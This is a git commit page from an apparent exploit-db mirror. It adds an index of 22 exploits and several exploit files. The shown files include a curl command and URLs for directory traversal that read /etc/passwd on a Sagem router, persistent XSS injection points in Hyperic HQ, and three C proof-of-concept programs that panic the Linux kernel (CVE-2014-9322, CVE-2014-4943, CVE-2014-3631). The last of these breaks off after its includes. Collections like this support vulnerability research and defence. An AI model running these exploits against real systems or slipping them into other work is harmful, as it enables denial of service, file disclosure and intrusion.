bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-03-06

Browse source 
22 new exploits
This commit is contained in:
Offensive Security 2015-03-06 08:35:37 +00:00
parent 5dff5f8ab5
commit b109a86d7a
23 changed files with 1831 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
files.csv
View file

@ -32656,6 +32656,8 @@ id,file,description,date,author,platform,type,port
36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0
36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 'id' Parameter SQL Injection Vulnerability",2011-10-12,"BHG Security Center",php,webapps,0
36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0
36230,platforms/php/webapps/36230.txt,"Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability",2015-03-02,"Ibrahim Raafat",php,webapps,0
36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability",2015-03-02,Net.Edit0r,php,webapps,80
36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0
36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability",2011-10-13,"Fredrik Widlund",multiple,dos,0
@ -32665,6 +32667,7 @@ id,file,description,date,author,platform,type,port
36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass Vulnerability",2011-10-17,"Deral Heiland PercX",multiple,remote,0
36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0
36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0
36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0
36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0
36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0
36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Filip Palian",multiple,remote,0
@ -32680,3 +32683,22 @@ id,file,description,date,author,platform,type,port
36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal Vulnerability",2011-10-26,"Sandro Gauci",hardware,remote,0
36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 Local Privilege Escalation Vulnerability",2011-10-26,"Buguroo Offensive Security",linux,local,0
36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0
36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 'professor.php' Script Multiple SQL Injection Vulnerabilities",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0
36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service Vulnerability",2011-10-28,"Marcel Bernhardt",windows,dos,0
36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0
36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443
36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,metasploit,php,remote,80
36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80
36266,platforms/lin_amd64/dos/36266.c,"Linux Kernel IRET Instruction #SS Fault Handling - Crash PoC",2015-03-04,"Emeric Nasi",lin_amd64,dos,0
36267,platforms/linux/dos/36267.c,"Linux Kernel PPP-over-L2TP Socket Level Handling - Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0
36268,platforms/linux/dos/36268.c,"Linux Kernel Associative Array Garbage Collection - Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0
36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 'post.php' SQL Injection Vulnerability",2011-10-28,"599eme Man",php,webapps,0
36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 'p48-search.html' Cross Site Scripting Vulnerability",2011-10-28,"599eme Man",php,webapps,0
36271,platforms/osx/dos/36271.py,"Apple Mac OS X <= 10.6.5 And iOS <= 4.3.3 Mail Denial of Service Vulnerability",2011-10-29,shebang42,osx,dos,0
36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross Site Scripting Vulnerability",2011-11-01,Mr.PaPaRoSSe,php,webapps,0
36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Include Vulnerabilities",2011-11-01,indoushka,php,webapps,0
36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0
36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross Site Scripting Vulnerability",2011-11-01,Isfahan,php,webapps,0
36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0
36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0
36281,platforms/php/webapps/36281.txt,"Symphony <= 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0

Can't render this file because it is too large.

21
platforms/hardware/webapps/36241.txt Executable file
View file

@ -0,0 +1,21 @@
# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected)
# Date : 2015-03-01
# Author : Loudiyi Mohamed
# Contact : Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
# Vulnerability description:
Sagem Fast is an ADSL Router using a web management interface in order to change configuration
settings. The router is Sagem Fast is an ADSL Router using a web management interface in order
to change configuration settings.
The web server of the router is vulnerable to directory traversal which allows reading files
by sending encoded '../' requests.
The vulnerability may be tested with the following command-line:
curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
Or directly from navigateur:
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp

221
platforms/jsp/webapps/36275.txt Executable file
View file

@ -0,0 +1,221 @@
source: http://www.securityfocus.com/bid/50456/info
Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. The impact of other issues is unknown.
These issues affect Hyperic HQ Enterprise 4.5.1; other versions may also be affected.
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local & low privileged user accounts.
For demonstration or reproduce ...
1.1
Code Review: HQ Roles [IVE - Persistent]
<td width="30%" class="BlockContent">
<!-- END VIEW MODE -->
</td></tr><tr valign="top">
<td width="20%" class="BlockLabel">Dashboard Name:</td>
<td width="30%" class="BlockContent">
<span id="dashboardString">New Role Dashboard</span></td>
<td width="20%" class="BlockLabel"></td>
<td width="30%" class="BlockContent"></td></tr></table>
<!-- / -->
Code Review: java.security.krb5.kdc Module: HQ Health / HQ Process Information & Diagnostics [IVE - Persistent]
- java.rmi.server.codebase = http://h1461735:9093/
- java.rmi.server.hostname = h1461735
- java.runtime.name = Java(TM) SE Runtime Environment
- java.runtime.version = 1.6.0_13-b03
- java.security.krb5.kdc = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
- java.security.krb5.realm = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
- java.specification.name = Java Platform API Specification
- java.specification.vendor = Sun Microsystems Inc.
- java.specification.version = 1.6
- java.vendor = Sun Microsystems Inc.
.../PoC/printReport(poc).hqu
Code Review: Browse - Monitor - Indikators [IVE - Persistent]
hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
<title>
HQ View Application Monitor Current Health - >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
</title>
<script type="text/javascript">
var onloads = [];
function initOnloads() {
if (arguments.callee.done) return;
... or
hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
<title>
>"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
</title>
<script type="text/javascript">
var onloads = [];
function initOnloads() {
if (arguments.callee.done) return;
arguments.callee.done = true;
if(typeof(_timer)!="undefined") clearInterval(_timer);
for ( var i = 0 ; i < onloads.length ; i++ )
onloads[i]();
Code Review: Applications ? All Applications - Topic [IVE - Persistent]
<li class="hasSubmenu"><a href="">Recently Viewed</a><div><ul>
<li><a href="/Resource.do?eid=4:10001">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>;
</a></li></ul></div></li></ul></div></li><li id="analyzeTab"><a href="#">Analyze</a><div><ul>
Code Review: General Properties - Inventory over Exception-Handling [IVE - Persistent]
<div id="exception27" style="visibility:hidden">javax.servlet.jsp.JspTagException: javax.servlet.jsp.JspException:
An error occurred while evaluating custom action attribute "sort" with value "${param.scs}": An exception occured trying to convert
String ">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>" to type "java.lang.Integer"
at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1456)
at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1438)
at org.hyperic.hq.ui.taglib.display.TableTag.evaluateAttributes(TableTag.java:1517)
at org.hyperic.hq.ui.taglib.display.TableTag.doStartTag(TableTag.java:226)
at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_display_005ftable_005f0(Unknown Source)
at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_html_005fform_005f0(Unknown Source)
at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspService(Unknown Source)
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspx_meth_tiles_005finsert_005f8(Unknown Source)
at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspService(Unknown Source)
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_tiles_005finsert_005f0(Unknown Source)
at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f1(Unknown Source)
at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f0(Unknown Source)
at org.apache.jsp.portal.ColumnsLayout_jsp._jspService(Unknown Source)
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
at org.apache.jsp.portal.MainLayout_jsp._jspx_meth_tiles_005finsert_005f2(Unknown Source)
at org.apache.jsp.portal.MainLayout_jsp._jspService(Unknown Source)
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:445)
at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:379)
at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292)
at org.apache.struts.action.RequestProcessor.doForward(RequestProcessor.java:1085)
at org.apache.struts.tiles.TilesRequestProcessor.doForward(TilesRequestProcessor.java:263)
at org.apache.struts.tiles.TilesRequestProcessor.processTilesDefinition(TilesRequestProcessor.java:239)
at org.apache.struts.tiles.TilesRequestProcessor.internalModuleRelativeForward(TilesRequestProcessor.java:341)
at org.apache.struts.action.RequestProcessor.processForward(RequestProcessor.java:572)
at org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:221)
at org.apache.struts.action.ActionServlet.process(ActionServlet.java:1196)
at org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:414)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.hyperic.hq.ui.AuthenticationFilter.doFilter(AuthenticationFilter.java:167)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.hyperic.hibernate.filter.SessionFilter$1.run(SessionFilter.java:59)
at org.hyperic.hq.hibernate.SessionManager.runInSessionInternal(SessionManager.java:79)
at org.hyperic.hq.hibernate.SessionManager.runInSession(SessionManager.java:68)
at org.hyperic.hibernate.filter.SessionFilter.doFilter(SessionFilter.java:57)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:164)
at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:141)
at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:90)
at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:417)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.hyperic.hq.product.servlet.filter.JMXFilter.doFilter(JMXFilter.java:322)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175)
at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:182)
at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262)
at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844)
at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446)
at java.lang.Thread.run(Unknown Source) </div>
1.2
References:
http://www.example.com/admin/role/RoleAdmin.do?mode=new
http://www.example.com/hqu/health/health/printReport.hqu
http://www.example.com/Resource.do?eid=4:10001
http://www.example.com/ResourceHub.do
http://www.example.com/resource/application/Inventory.do?mode=view&accord=3&eid=4:10001&sos=dec&scs=
Code Review: Escalation Schemes Configuration [XSS]
http://www.example.com/admin/config/Config.do?mode=escalate&escId=[INCLUDE CLIENT_SIDE SCRIPTCODE HERE!!!]
References:
http://www.example.com/admin/config/Config.do?mode=escalate&escId=

155
platforms/lin_amd64/dos/36266.c Executable file
View file

@ -0,0 +1,155 @@
/* ----------------------------------------------------------------------------------------------------
* cve-2014-9322_poc.c
*
* arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
* properly handle faults associated with the Stack Segment (SS) segment
* register, which allows local users to gain privileges by triggering an IRET
* instruction that leads to access to a GS Base address from the wrong space.
*
* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
*
* I have no merit to writing this poc, I just implemented first part of Rafal Wojtczuk article (this guy is a genius!)
* More info at : http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
*
*
* Compile with gcc -fno-stack-protector -Wall -o cve-2014-9322_poc cve-2014-9322_poc.c -lpthread
*
* Emeric Nasi - www.sevagas.com
*-----------------------------------------------------------------------------------------------------*/
// Only works on x86_64 platform
#ifdef __x86_64__
/* ----------------------- Includes ----------------------------*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <asm/ldt.h>
#include <pthread.h>
#include <sys/time.h>
#include <inttypes.h>
#include <stdbool.h>
#include <errno.h>
#include <sys/user.h>
/* ----------------------- definitions ----------------------------*/
#define TARGET_KERNEL_MIN "3.0.0"
#define TARGET_KERNEL_MAX "3.17.4"
#define EXPLOIT_NAME "cve-2014-9322"
#define EXPLOIT_TYPE DOS
#define FALSE_SS_BASE 0x10000UL
#define MAP_SIZE 0x10000
/* ----------------------- Global variables ----------------------------*/
struct user_desc new_stack_segment;
/* ----------------------- functions ----------------------------*/
/**
* Creates a new segment in Local Descriptor Table
*/
static bool add_ldt(struct user_desc *desc, const char *name)
{
if (syscall(SYS_modify_ldt, 1, desc, sizeof(struct user_desc)) == 0)
{
return true;
}
else
{
printf("[cve_2014_9322 error]: Failed to create %s segment\n", name);
printf("modify_ldt failed, %s\n", strerror(errno));
return false;
}
}
int FLAG = 0;
void * segManipulatorThread(void * none)
{
new_stack_segment.entry_number = 0x12;
new_stack_segment.base_addr = 0x10000;
new_stack_segment.limit = 0xffff;
new_stack_segment.seg_32bit = 1;
new_stack_segment.contents = MODIFY_LDT_CONTENTS_STACK; /* Data, grow-up */
new_stack_segment.read_exec_only = 0;
new_stack_segment.limit_in_pages = 0;
new_stack_segment.seg_not_present = 0;
new_stack_segment.useable = 0;
new_stack_segment.lm = 0;
// Create a new stack segment
add_ldt(&new_stack_segment, "newSS");
// Wait for main thread to use new stack segment
sleep(3);
// Invalidate stack segment
new_stack_segment.seg_not_present = 1;
add_ldt(&new_stack_segment, "newSS disable");
FLAG = 1;
sleep(15);
return NULL;
}
/**
* DOS poc for cve_2014_9322 vulnerability
*/
int main()
{
pthread_t thread1;
uint8_t *code;
printf("[cve_2014_9322]: Preparing to exploit.\n");
// map area for false SS
code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
if (code != (uint8_t *) FALSE_SS_BASE)
{
fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE);
return -1;
}
printf("[cve_2014_9322]: Panic!\n");
if(pthread_create(&thread1, NULL, segManipulatorThread, NULL)!= 0)
{
perror("[cve_2014_9322 error]: pthread_create");
return false;
}
// Wait for segManipulatorThread to create new stack segment
sleep(1);
// Set stack segment to newly created one in segManipulatorThread
asm volatile ("mov %0, %%ss;"
:
:"r" (0x97)
);
while(FLAG == 0){};
sleep(4);
return 0;
}
#endif // __x86_64__

161
platforms/linux/dos/36267.c Executable file
View file

@ -0,0 +1,161 @@
/* ----------------------------------------------------------------------------------------------------
* cve-2014-4943_poc.c
*
* The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure
* differences between an l2tp socket and an inet socket.
*
* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
* I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.
* There are some kernel structures that can be overwriten but I didn't manage to find the ultimate trick to at least point back to userland.
* If seems guys at immunuty found a way using race condition.
*
*
* Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c
*
* Emeric Nasi - www.sevagas.com
*-----------------------------------------------------------------------------------------------------*/
/* ----------------------- Includes ----------------------------*/
#include <netinet/ip.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <linux/net.h>
#include <linux/udp.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <linux/if_pppol2tp.h>
/* ----------------------- Definitions ----------------------------*/
#define TARGET_KERNEL_MIN "3.2.0"
#define TARGET_KERNEL_MAX "3.15.6"
#define EXPLOIT_NAME "cve-2014-4943"
/* ----------------------- functions ----------------------------*/
/**
* It is possible to modify several parts of socket object using IP options frop UDP setsockopt
* For this POC, IP_OPTIONS is the easiest way to panic kernel
*/
void modifyUDPvalues(int tunnel_fd)
{
/* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:
int udp_setsockopt(struct sock *sk, int level, int optname,
char __user *optval, unsigned int optlen)
{
if (level == SOL_UDP || level == SOL_UDPLITE)
return udp_lib_setsockopt(sk, level, optname, optval, optlen,
udp_push_pending_frames);
return ip_setsockopt(sk, level, optname, optval, optlen);
}
*/
int ip_options = 0x1;
if (setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20) == -1)
{
perror("setsockopt (IP_OPTIONS)");
}
}
/**
* DOS poc for cve_2014_4943 vulnerability
*/
int main()
{
int tunnel_fd;
int tunnel_fd2;
int udp_fd;
printf("[cve_2014_4943]: Preparing to exploit.\n");
/* Create first L2TP socket */
tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (tunnel_fd < 0)
{
perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
return -1;
}
/* Create second L2TP socket */
tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (tunnel_fd2 < 0)
{
perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
return -1;
}
if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("cannot create socket");
return -1;
}
/* Connect LT2P socket */
struct sockaddr_pppol2tp sax;
memset(&sax, 0, sizeof(sax));
sax.sa_family = AF_PPPOX;
sax.sa_protocol = PX_PROTO_OL2TP;
sax.pppol2tp.fd = udp_fd; /* fd of tunnel UDP socket */
sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;
sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;
sax.pppol2tp.addr.sin_family = AF_INET;
sax.pppol2tp.s_tunnel = 8;//tunnel_id;
sax.pppol2tp.s_session = 0; /* special case: mgmt socket */
sax.pppol2tp.d_tunnel = 0;
sax.pppol2tp.d_session = 0; /* special case: mgmt socket */
if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )
{
perror("connect failed");
}
/* Connect LT2P socket */
struct sockaddr_pppol2tp sax2;
memset(&sax, 0, sizeof(sax2));
sax2.sa_family = AF_PPPOX;
sax2.sa_protocol = PX_PROTO_OL2TP;
sax2.pppol2tp.s_tunnel = 8;//tunnel_id;
sax2.pppol2tp.s_session = 1;
sax2.pppol2tp.d_tunnel = 0;
sax2.pppol2tp.d_session = 1;
if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )
{
perror("connect failed");
}
/*
* Entering critical part
*/
printf("[cve_2014_4943]: Panic!\n");
//modifyUDPvalues(tunnel_fd);
modifyUDPvalues(tunnel_fd2);
// close opened socket
puts("\n [+] Closing sockets...");
close(tunnel_fd);
close(tunnel_fd2);
exit(0);
}

107
platforms/linux/dos/36268.c Executable file
View file

@ -0,0 +1,107 @@
/* ----------------------------------------------------------------------------------------------------
* cve-2014-3631_poc.c
*
* The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3
* does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash)
* or possibly have unspecified other impact via multiple "keyctl newring" operations followed by a "keyctl timeout" operation.
*
*
* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
*
* Compile with gcc -fno-stack-protector -Wall -o cve-2014-3631_poc cve-2014-3631_poc.c -lkeyutils
*
*
* Emeric Nasi - www.sevagas.com
*-----------------------------------------------------------------------------------------------------*/
/* ----------------------- Includes ----------------------------*/
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <inttypes.h>
#include <keyutils.h>
